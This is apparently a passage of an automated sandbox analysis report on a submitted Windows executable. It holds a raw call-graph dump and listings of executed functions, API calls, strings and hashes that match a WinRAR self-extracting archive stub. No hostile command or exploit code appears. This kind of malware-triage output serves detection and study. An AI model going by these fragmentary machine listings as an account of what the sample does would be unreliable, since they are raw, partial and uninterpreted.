25174 b820bd 78 API calls 25128->25174 25130 b83c8f 25173 b8138b 74 API calls 25130->25173 25131 b83c71 25131->25126 25131->25128 25131->25130 25134 b83d41 25137 b83dd7 25134->25137 25138 b83dc7 25134->25138 25181 b93020 123 API calls 25137->25181 25161 b89215 25138->25161 25141 b83dd5 25141->25143 25182 b82021 74 API calls 25141->25182 25183 b92297 25143->25183 25144->25104 25145->25105 25146->25102 25148 b9338c 25147->25148 25150 b93396 ___std_exception_copy 25147->25150 25190 b86ca7 75 API calls 25148->25190 25151 b934c6 25150->25151 25154 b9341c 25150->25154 25156 b93440 _abort 25150->25156 25192 ba238d RaiseException 25151->25192 25191 b932aa 75 API calls 3 library calls 25154->25191 25155 b934f2 25156->25131 25158 b8ab28 25157->25158 25160 b8ab32 25157->25160 25159 b9eb38 8 API calls 25158->25159 25159->25160 25160->25134 25162 b8921f __EH_prolog 25161->25162 25193 b87c64 25162->25193 25165 b813ba 78 API calls 25166 b89231 25165->25166 25196 b8d114 25166->25196 25168 b8928a 25168->25141 25170 b8d114 118 API calls 25171 b89243 25170->25171 25171->25168 25171->25170 25205 b8d300 97 API calls __InternalCxxFrameHandler 25171->25205 25172->25123 25173->25143 25174->25126 25176 b8d072 25175->25176 25177 b8d084 25175->25177 25206 b8603a 82 API calls 25176->25206 25207 b8603a 82 API calls 25177->25207 25180 b8d07c 25180->25127 25181->25141 25182->25143 25184 b922a1 25183->25184 25185 b922ba 25184->25185 25188 b922ce 25184->25188 25208 b90eed 86 API calls 25185->25208 25187 b922c1 25187->25188 25189->25123 25190->25150 25191->25156 25192->25155 25194 b8b146 GetVersionExW 25193->25194 25195 b87c69 25194->25195 25195->25165 25202 b8d12a __InternalCxxFrameHandler 25196->25202 25197 b8d29a 25198 b8d2ce 25197->25198 25199 b8d0cb 6 API calls 25197->25199 25200 b90e08 SetThreadExecutionState RaiseException 25198->25200 25199->25198 25203 b8d291 25200->25203 25201 b98c8d 103 API calls 25201->25202 25202->25197 25202->25201 25202->25203 25204 b8ac05 91 API calls 25202->25204 25203->25171 25204->25202 25205->25171 25206->25180 25207->25180 25208->25187 25209->24928 25210->24928 25211->24926 25213 b85d2a 25212->25213 25259 b85c4b 25213->25259 25216 b85d5d 25217 b85d95 25216->25217 25264 b8b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25216->25264 25217->24943 25219 b88186 25218->25219 25220 b88232 25219->25220 25271 b8be5e 19 API calls __InternalCxxFrameHandler 25219->25271 25270 b91fac CharUpperW 25220->25270 25223 b8823b 25223->24946 25225 b87c22 25224->25225 25226 b87c5a 25225->25226 25272 b86e7a 74 API calls 25225->25272 25226->24951 25228 b87c52 25273 b8138b 74 API calls 25228->25273 25230->25010 25232 b89db3 25231->25232 25234 b89dc2 25231->25234 25233 b89db9 FlushFileBuffers 25232->25233 25232->25234 25233->25234 25235 b89e3f SetFileTime 25234->25235 25235->25014 25236->24935 25237->24942 25238->24942 25239->24951 25240->24951 25241->24952 25242->24967 25243->24964 25244->24967 25246 b88b5a 25245->25246 25247 b898c5 GetFileType 25245->25247 25246->24978 25248 b82021 74 API calls 25246->25248 25247->25246 25248->24976 25249->24978 25250->24979 25251->25004 25252->25004 25253->25004 25254->25004 25255->25004 25256->25008 25257->25017 25258->25007 25265 b85b48 25259->25265 25262 b85b48 2 API calls 25263 b85c6c 25262->25263 25263->25216 25264->25216 25267 b85b52 25265->25267 25266 b85c3a 25266->25262 25266->25263 25267->25266 25269 b8b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25267->25269 25269->25267 25270->25223 25271->25220 25272->25228 25273->25226 25275 b8cef2 25274->25275 25280 b8a99e 25275->25280 25277 b8cf24 25278 b8a99e 86 API calls 25277->25278 25279 b8cf2f 25278->25279 25281 b8a9c1 25280->25281 25284 b8a9d5 25280->25284 25285 b90eed 86 API calls 25281->25285 25283 b8a9c8 25283->25284 25284->25277 25285->25283 25286->25025 25288 b8a6a8 25287->25288 25289 b8a6c1 FindFirstFileW 25288->25289 25290 b8a727 FindNextFileW 25288->25290 25292 b8a6d0 25289->25292 25297 b8a709 25289->25297 25291 b8a732 GetLastError 25290->25291 25290->25297 25291->25297 25293 b8bb03 GetCurrentDirectoryW 25292->25293 25294 b8a6e0 25293->25294 25295 b8a6fe GetLastError 25294->25295 25296 b8a6e4 FindFirstFileW 25294->25296 25295->25297 25296->25295 25296->25297 25297->24876 25298->24679 25299->24687 25300->24687 25301->24690 25302->24698 25304 b89f42 78 API calls 25303->25304 25305 b81fe8 25304->25305 25306 b81a04 101 API calls 25305->25306 25309 b82005 25305->25309 25307 b81ff5 25306->25307 25307->25309 25310 b8138b 74 API calls 25307->25310 25309->24706 25309->24707 25310->25309 25312 b9b5bc GetDlgItem 25311->25312 25313 b9b583 GetMessageW 25311->25313 25312->24717 25312->24718 25314 b9b599 IsDialogMessageW 25313->25314 25315 b9b5a8 TranslateMessage DispatchMessageW 25313->25315 25314->25312 25314->25315 25315->25312 25316 b813e1 84 API calls 2 library calls 25436 b994e0 GetClientRect 25437 b9f2e0 46 API calls __RTC_Initialize 25489 b921e0 26 API calls std::bad_exception::bad_exception 25438 babee0 GetCommandLineA GetCommandLineW 25318 b9eae7 25319 b9eaf1 25318->25319 25320 b9e85d ___delayLoadHelper2@8 14 API calls 25319->25320 25321 b9eafe 25320->25321 25439 b9f4e7 29 API calls _abort 25440 ba0ada 51 API calls 2 library calls 25385 b9e1d1 14 API calls ___delayLoadHelper2@8 25441 b9f4d3 20 API calls 25491 baa3d0 21 API calls _free 25492 bb2bd0 VariantClear 25389 b810d5 25394 b85abd 25389->25394 25395 b85ac7 __EH_prolog 25394->25395 25396 b8b505 84 API calls 25395->25396 25397 b85ad3 25396->25397 25401 b85cac GetCurrentProcess GetProcessAffinityMask 25397->25401 25402 b9e2d7 25403 b9e1db 25402->25403 25404 b9e85d ___delayLoadHelper2@8 14 API calls 25403->25404 25404->25403 25444 b962ca 123 API calls __InternalCxxFrameHandler 25495 b9b5c0 100 API calls 25496 b977c0 118 API calls 25497 b9ffc0 RaiseException _com_error::_com_error CallUnexpected 25411 b9dec2 25412 b9decf 25411->25412 25413 b8e617 53 API calls 25412->25413 25414 b9dedc 25413->25414 25415 b84092 _swprintf 51 API calls 25414->25415 25416 b9def1 SetDlgItemTextW 25415->25416 25417 b9b568 5 API calls 25416->25417 25418 b9df0e 25417->25418 25499 b9f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25500 b9ff30 LocalFree 23536 babb30 23537 babb39 23536->23537 23539 babb42 23536->23539 23540 baba27 23537->23540 23560 ba97e5 GetLastError 23540->23560 23542 baba34 23580 babb4e 23542->23580 23544 baba3c 23589 bab7bb 23544->23589 23547 baba53 23547->23539 23550 baba96 23614 ba8dcc 23550->23614 23554 baba91 23613 ba91a8 20 API calls _free 23554->23613 23556 babada 23556->23550 23620 bab691 26 API calls 23556->23620 23557 babaae 23557->23556 23558 ba8dcc _free 20 API calls 23557->23558 23558->23556 23561 ba97fb 23560->23561 23562 ba9801 23560->23562 23621 baae5b 11 API calls 2 library calls 23561->23621 23566 ba9850 SetLastError 23562->23566 23622 bab136 23562->23622 23566->23542 23568 ba8dcc _free 20 API calls 23570 ba9821 23568->23570 23569 ba9830 23571 ba9837 23569->23571 23572 ba981b 23569->23572 23574 ba985c SetLastError 23570->23574 23630 ba9649 20 API calls _free 23571->23630 23572->23568 23631 ba8d24 38 API calls _abort 23574->23631 23575 ba9842 23577 ba8dcc _free 20 API calls 23575->23577 23579 ba9849 23577->23579 23579->23566 23579->23574 23581 babb5a ___scrt_is_nonwritable_in_current_image 23580->23581 23582 ba97e5 _abort 38 API calls 23581->23582 23585 babb64 23582->23585 23584 babbe8 _abort 23584->23544 23585->23584 23588 ba8dcc _free 20 API calls 23585->23588 23634 ba8d24 38 API calls _abort 23585->23634 23635 baac31 EnterCriticalSection 23585->23635 23636 babbdf LeaveCriticalSection _abort 23585->23636 23588->23585 23637 ba4636 23589->23637 23592 bab7ee 23594 bab805 23592->23594 23595 bab7f3 GetACP 23592->23595 23593 bab7dc GetOEMCP 23593->23594 23594->23547 23596 ba8e06 23594->23596 23595->23594 23597 ba8e44 23596->23597 23598 ba8e14 _free 23596->23598 23648 ba91a8 20 API calls _free 23597->23648 23598->23597 23600 ba8e2f RtlAllocateHeap 23598->23600 23647 ba7a5e 7 API calls 2 library calls 23598->23647 23600->23598 23601 ba8e42 23600->23601 23601->23550 23603 babbf0 23601->23603 23604 bab7bb 40 API calls 23603->23604 23605 babc0f 23604->23605 23608 babc60 IsValidCodePage 23605->23608 23610 babc16 23605->23610 23612 babc85 _abort 23605->23612 23607 baba89 23607->23554 23607->23557 23609 babc72 GetCPInfo 23608->23609 23608->23610 23609->23610 23609->23612 23659 b9fbbc 23610->23659 23649 bab893 GetCPInfo 23612->23649 23613->23550 23615 ba8dd7 RtlFreeHeap 23614->23615 23616 ba8e00 _free 23614->23616 23615->23616 23617 ba8dec 23615->23617 23616->23547 23740 ba91a8 20 API calls _free 23617->23740 23619 ba8df2 GetLastError 23619->23616 23620->23550 23621->23562 23628 bab143 _free 23622->23628 23623 bab183 23633 ba91a8 20 API calls _free 23623->23633 23624 bab16e RtlAllocateHeap 23626 ba9813 23624->23626 23624->23628 23626->23572 23629 baaeb1 11 API calls 2 library calls 23626->23629 23628->23623 23628->23624 23632 ba7a5e 7 API calls 2 library calls 23628->23632 23629->23569 23630->23575 23632->23628 23633->23626 23635->23585 23636->23585 23638 ba4653 23637->23638 23639 ba4649 23637->23639 23638->23639 23640 ba97e5 _abort 38 API calls 23638->23640 23639->23592 23639->23593 23641 ba4674 23640->23641 23645 ba993a 38 API calls __cftof 23641->23645 23643 ba468d 23646 ba9967 38 API calls __cftof 23643->23646 23645->23643 23646->23639 23647->23598 23648->23601 23654 bab8cd 23649->23654 23658 bab977 23649->23658 23651 b9fbbc _ValidateLocalCookies 5 API calls 23653 baba23 23651->23653 23653->23610 23666 bac988 23654->23666 23657 baab78 __vswprintf_c_l 43 API calls 23657->23658 23658->23651 23660 b9fbc5 IsProcessorFeaturePresent 23659->23660 23661 b9fbc4 23659->23661 23663 b9fc07 23660->23663 23661->23607 23739 b9fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23663->23739 23665 b9fcea 23665->23607 23667 ba4636 __cftof 38 API calls 23666->23667 23668 bac9a8 MultiByteToWideChar 23667->23668 23670 bac9e6 23668->23670 23678 baca7e 23668->23678 23673 ba8e06 __vswprintf_c_l 21 API calls 23670->23673 23675 baca07 _abort __vsnwprintf_l 23670->23675 23671 b9fbbc _ValidateLocalCookies 5 API calls 23674 bab92e 23671->23674 23672 baca78 23685 baabc3 20 API calls _free 23672->23685 23673->23675 23680 baab78 23674->23680 23675->23672 23677 baca4c MultiByteToWideChar 23675->23677 23677->23672 23679 baca68 GetStringTypeW 23677->23679 23678->23671 23679->23672 23681 ba4636 __cftof 38 API calls 23680->23681 23682 baab8b 23681->23682 23686 baa95b 23682->23686 23685->23678 23687 baa976 __vswprintf_c_l 23686->23687 23688 baa99c MultiByteToWideChar 23687->23688 23689 baab50 23688->23689 23690 baa9c6 23688->23690 23691 b9fbbc _ValidateLocalCookies 5 API calls 23689->23691 23693 ba8e06 __vswprintf_c_l 21 API calls 23690->23693 23696 baa9e7 __vsnwprintf_l 23690->23696 23692 baab63 23691->23692 23692->23657 23693->23696 23694 baaa9c 23722 baabc3 20 API calls _free 23694->23722 23695 baaa30 MultiByteToWideChar 23695->23694 23697 baaa49 23695->23697 23696->23694 23696->23695 23713 baaf6c 23697->23713 23701 baaaab 23703 ba8e06 __vswprintf_c_l 21 API calls 23701->23703 23707 baaacc __vsnwprintf_l 23701->23707 23702 baaa73 23702->23694 23705 baaf6c __vswprintf_c_l 11 API calls 23702->23705 23703->23707 23704 baab41 23721 baabc3 20 API calls _free 23704->23721 23705->23694 23707->23704 23708 baaf6c __vswprintf_c_l 11 API calls 23707->23708 23709 baab20 23708->23709 23709->23704 23710 baab2f WideCharToMultiByte 23709->23710 23710->23704 23711 baab6f 23710->23711 23723 baabc3 20 API calls _free 23711->23723 23724 baac98 23713->23724 23717 baafdc LCMapStringW 23718 baaf9c 23717->23718 23719 b9fbbc _ValidateLocalCookies 5 API calls 23718->23719 23720 baaa60 23719->23720 23720->23694 23720->23701 23720->23702 23721->23694 23722->23689 23723->23694 23725 baacc8 23724->23725 23726 baacc4 23724->23726 23725->23718 23731 baaff4 10 API calls 3 library calls 23725->23731 23726->23725 23730 baace8 23726->23730 23732 baad34 23726->23732 23728 baacf4 GetProcAddress 23729 baad04 _free 23728->23729 23729->23725 23730->23725 23730->23728 23731->23717 23733 baad4a 23732->23733 23734 baad55 LoadLibraryExW 23732->23734 23733->23726 23735 baad8a 23734->23735 23736 baad72 GetLastError 23734->23736 23735->23733 23737 baada1 FreeLibrary 23735->23737 23736->23735 23738 baad7d LoadLibraryExW 23736->23738 23737->23733 23738->23735 23739->23665 23740->23619 25447 bac030 GetProcessHeap 25448 b9c220 93 API calls _swprintf 25450 baf421 21 API calls __vswprintf_c_l 25451 b81025 29 API calls 25503 b81710 86 API calls 25504 b9ad10 73 API calls 25454 b9a400 GdipDisposeImage GdipFree 25455 b9d600 70 API calls 25456 ba6000 QueryPerformanceFrequency QueryPerformanceCounter 25458 baf200 51 API calls 25507 ba2900 6 API calls 4 library calls 25509 baa700 21 API calls 24383 b89f7a 24384 b89f88 24383->24384 24385 b89f8f 24383->24385 24386 b89f9c GetStdHandle 24385->24386 24393 b89fab 24385->24393 24386->24393 24387 b8a003 WriteFile 24387->24393 24388 b89fcf 24389 b89fd4 WriteFile 24388->24389 24388->24393 24389->24388 24389->24393 24391 b8a095 24395 b86e98 77 API calls 24391->24395 24393->24384 24393->24387 24393->24388 24393->24389 24393->24391 24394 b86baa 78 API calls 24393->24394 24394->24393 24395->24384 25460 b9a070 10 API calls 25462 b9b270 99 API calls 25512 b81f72 128 API calls __EH_prolog 24422 b89a74 24426 b89a7e 24422->24426 24423 b89ab1 24424 b89b9d SetFilePointer 24424->24423 24425 b89bb6 GetLastError 24424->24425 24425->24423 24426->24423 24426->24424 24428 b89b79 24426->24428 24429 b8981a 24426->24429 24428->24424 24430 b89833 24429->24430 24432 b89e80 79 API calls 24430->24432 24431 b89865 24431->24428 24432->24431 25463 b81075 84 API calls 25464 ba8268 55 API calls _free 25465 b9c793 107 API calls 4 library calls 25513 ba7f6e 52 API calls 2 library calls 25322 b9cd58 25324 b9ce22 25322->25324 25330 b9cd7b 25322->25330 25323 b9b314 ExpandEnvironmentStringsW 25325 b9c793 _wcslen _wcsrchr 25323->25325 25324->25325 25350 b9d78f 25324->25350 25325->25323 25327 b9d40a 25325->25327 25331 b9ca67 SetWindowTextW 25325->25331 25334 ba3e3e 22 API calls 25325->25334 25336 b9c855 SetFileAttributesW 25325->25336 25341 b9cc31 GetDlgItem SetWindowTextW SendMessageW 25325->25341 25345 b9cc71 SendMessageW 25325->25345 25349 b91fbb CompareStringW 25325->25349 25374 b9a64d GetCurrentDirectoryW 25325->25374 25376 b8a5d1 6 API calls 25325->25376 25377 b8a55a FindClose 25325->25377 25378 b9b48e 76 API calls 2 library calls 25325->25378 25329 b91fbb CompareStringW 25329->25330 25330->25324 25330->25329 25331->25325 25334->25325 25338 b9c90f GetFileAttributesW 25336->25338 25348 b9c86f _abort _wcslen 25336->25348 25338->25325 25340 b9c921 DeleteFileW 25338->25340 25340->25325 25342 b9c932 25340->25342 25341->25325 25343 b84092 _swprintf 51 API calls 25342->25343 25344 b9c952 GetFileAttributesW 25343->25344 25344->25342 25346 b9c967 MoveFileW 25344->25346 25345->25325 25346->25325 25347 b9c97f MoveFileExW 25346->25347 25347->25325 25348->25325 25348->25338 25375 b8b991 51 API calls 2 library calls 25348->25375 25349->25325 25352 b9d799 _abort _wcslen 25350->25352 25351 b9d9e7 25351->25325 25352->25351 25353 b9d9c0 25352->25353 25354 b9d8a5 25352->25354 25379 b91fbb CompareStringW 25352->25379 25353->25351 25357 b9d9de ShowWindow 25353->25357 25356 b8a231 3 API calls 25354->25356 25358 b9d8ba 25356->25358 25357->25351 25359 b9d8d9 ShellExecuteExW 25358->25359 25380 b8b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25358->25380 25359->25351 25366 b9d8ec 25359->25366 25361 b9d8d1 25361->25359 25362 b9d925 25381 b9dc3b 6 API calls 25362->25381 25363 b9d97b CloseHandle 25364 b9d989 25363->25364 25365 b9d994 25363->25365 25382 b91fbb CompareStringW 25364->25382 25365->25353 25366->25362 25366->25363 25368 b9d91b ShowWindow 25366->25368 25368->25362 25370 b9d93d 25370->25363 25371 b9d950 GetExitCodeProcess 25370->25371 25371->25363 25372 b9d963 25371->25372 25372->25363 25374->25325 25375->25348 25376->25325 25377->25325 25378->25325 25379->25354 25380->25361 25381->25370 25382->25365 25387 bac051 31 API calls _ValidateLocalCookies 25467 b9e455 14 API calls ___delayLoadHelper2@8 25468 b9a440 GdipCloneImage GdipAlloc 25469 ba3a40 5 API calls _ValidateLocalCookies 25517 bb1f40 CloseHandle

                                                                                                                    Executed Functions

                                                                                                                    Function 00B9DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B90863: GetModuleHandleW.KERNEL32(kernel32), ref: 00B9087C
                                                                                                                      • Part of subcall function 00B90863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B9088E
                                                                                                                      • Part of subcall function 00B90863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B908BF
                                                                                                                      • Part of subcall function 00B9A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B9A655
                                                                                                                      • Part of subcall function 00B9AC16: OleInitialize.OLE32(00000000), ref: 00B9AC2F
                                                                                                                      • Part of subcall function 00B9AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9AC66
                                                                                                                      • Part of subcall function 00B9AC16: SHGetMalloc.SHELL32(00BC8438), ref: 00B9AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 00B9DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B9DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B9DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00B9DFCE
                                                                                                                      • Part of subcall function 00B9DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9DBF4
                                                                                                                      • Part of subcall function 00B9DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B9DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00BDEC90,00000800), ref: 00B9DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00BDEC90), ref: 00B9DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00B9E009
                                                                                                                    • _swprintf.LIBCMT ref: 00B9E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B9E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B9E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00B9E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00B9E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 00B9E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 00B9E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 00B9E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 00B9E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                    • API String ID: 3049964643-277078469
                                                                                                                    • Opcode ID: 6fe51c467af7051d85c210280c7814ca6b7be2192c90d91ed8b67a86adb0cc3a
                                                                                                                    • Instruction ID: 89db4f17ce7a523f107416b3c28c778b9faba70f24fdc757c33518f07f4d0c2a
                                                                                                                    • Opcode Fuzzy Hash: 6fe51c467af7051d85c210280c7814ca6b7be2192c90d91ed8b67a86adb0cc3a
                                                                                                                    • Instruction Fuzzy Hash: C061E371504255ABDB20AB79AC59F6B77ECEB48B00F0404BAF905A32A1EFB4D944C762
                                                                                                                    Function 00B9A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 812 b9a6c2-b9a6df FindResourceW 813 b9a7db 812->813 814 b9a6e5-b9a6f6 SizeofResource 812->814 816 b9a7dd-b9a7e1 813->816 814->813 815 b9a6fc-b9a70b LoadResource 814->815 815->813 817 b9a711-b9a71c LockResource 815->817 817->813 818 b9a722-b9a737 GlobalAlloc 817->818 819 b9a73d-b9a746 GlobalLock 818->819 820 b9a7d3-b9a7d9 818->820 821 b9a7cc-b9a7cd GlobalFree 819->821 822 b9a74c-b9a76a call ba0320 CreateStreamOnHGlobal 819->822 820->816 821->820 825 b9a76c-b9a78e call b9a626 822->825 826 b9a7c5-b9a7c6 GlobalUnlock 822->826 825->826 831 b9a790-b9a798 825->831 826->821 832 b9a79a-b9a7ae GdipCreateHBITMAPFromBitmap 831->832 833 b9a7b3-b9a7c1 831->833 832->833 834 b9a7b0 832->834 833->826 834->833
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00B9B73D,00000066), ref: 00B9A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B9B73D,00000066), ref: 00B9A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B9A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B9A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B9A7C6
                                                                                                                      • Part of subcall function 00B9A626: GdipAlloc.GDIPLUS(00000010), ref: 00B9A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B9A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B9A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: PNG
                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                    • Opcode ID: 4f62a924a49a3f5ae6aefbd3c45c333693afd52acc06bc07985177f5f93e0e4f
                                                                                                                    • Instruction ID: 632a58ed567dd89e25ad058b320b5842a04547eae645f9349217f873fe9700d4
                                                                                                                    • Opcode Fuzzy Hash: 4f62a924a49a3f5ae6aefbd3c45c333693afd52acc06bc07985177f5f93e0e4f
                                                                                                                    • Instruction Fuzzy Hash: 56319E75601702AFCB119F65EC89D2B7BFCFF89B50B000A69F805A3261EF75DC408AA1
                                                                                                                    Function 00B8A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1025 b8a69b-b8a6bf call b9ec50 1028 b8a6c1-b8a6ce FindFirstFileW 1025->1028 1029 b8a727-b8a730 FindNextFileW 1025->1029 1030 b8a742-b8a7ff call b90602 call b8c310 call b915da * 3 1028->1030 1032 b8a6d0-b8a6e2 call b8bb03 1028->1032 1029->1030 1031 b8a732-b8a740 GetLastError 1029->1031 1036 b8a804-b8a811 1030->1036 1033 b8a719-b8a722 1031->1033 1040 b8a6fe-b8a707 GetLastError 1032->1040 1041 b8a6e4-b8a6fc FindFirstFileW 1032->1041 1033->1036 1043 b8a709-b8a70c 1040->1043 1044 b8a717 1040->1044 1041->1030 1041->1040 1043->1044 1046 b8a70e-b8a711 1043->1046 1044->1033 1046->1044 1048 b8a713-b8a715 1046->1048 1048->1033
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6C4
                                                                                                                      • Part of subcall function 00B8BB03: _wcslen.LIBCMT ref: 00B8BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00B8A592,000000FF,?,?), ref: 00B8A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: a833d706ec3e5fbaf9974933c4275037d7d1d55aa90b67cb922bd4443a144960
                                                                                                                    • Instruction ID: 7292970707e1acc6c493f83fb9b9a7047b857133c4f626c8abf1bd34a7fada67
                                                                                                                    • Opcode Fuzzy Hash: a833d706ec3e5fbaf9974933c4275037d7d1d55aa90b67cb922bd4443a144960
                                                                                                                    • Instruction Fuzzy Hash: 5C416D76900515ABCB25EF68CC84AE9B7F8FF48350F1042A6E559E3210DB34AE90DF90
